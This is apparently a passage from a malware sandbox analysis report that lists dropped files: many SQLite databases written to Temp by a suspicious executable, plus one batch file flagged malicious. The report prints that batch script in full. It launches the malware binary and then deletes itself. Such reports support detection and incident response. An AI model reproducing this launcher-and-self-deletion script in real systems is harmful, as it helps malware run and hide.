                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\1Q9e2DmKuK

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\1TrINQYVcJ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\1n0SQU5MKx

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\25buwBa2ql

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):218
                                                                                                Entropy (8bit):5.177909013442466
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:hCijTg3Nou1SV+DEimWXpIyEyKOZG1wkn23fdxh:HTg9uYDEoIypflX
                                                                                                MD5:2471D4EFD2195043CEDD2AC4FB31488F
                                                                                                SHA1:F9506B88BD4464D522BF020D2B27F6A32317AE49
                                                                                                SHA-256:7D38380C5CE1F5749C18FCB50F884D403E6979D6580DD712AC61EEEF153AA550
                                                                                                SHA-512:739F9C60DB594DC08DCBC4CDEFE2CEDE8DF85C524911BAEC70EE3179B03D657E696C5EE59F6305F528DEDC5E61FCBF53C24E7348BB5184880BDF3C9DB1E8467A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\ShellExperiences\uAsLgsGzSk.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2K3wfCcSpW.bat"

                                                                                                C:\Users\user\AppData\Local\Temp\2POFNQ798J

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\2PbfpHsZDh

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\2b926zOuV1

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\3W7jZa62wc

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\3fffmSz1ON

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\3rrYSu75Jn

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\4hSK9bJ5l4

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\4ovsZDzFm8

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\5KBDoc20mZ

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\5KF8hdLPGv

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\5NX80Huebj

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\5RB7lrK5VK

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\5uTkSwXIsF

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\69cvD6KBle

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\6EC9LsTmWL

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\6PnuVMd2Kt

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\6RN2dVAAet

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\6jzdY3pWNC

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):98304
                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
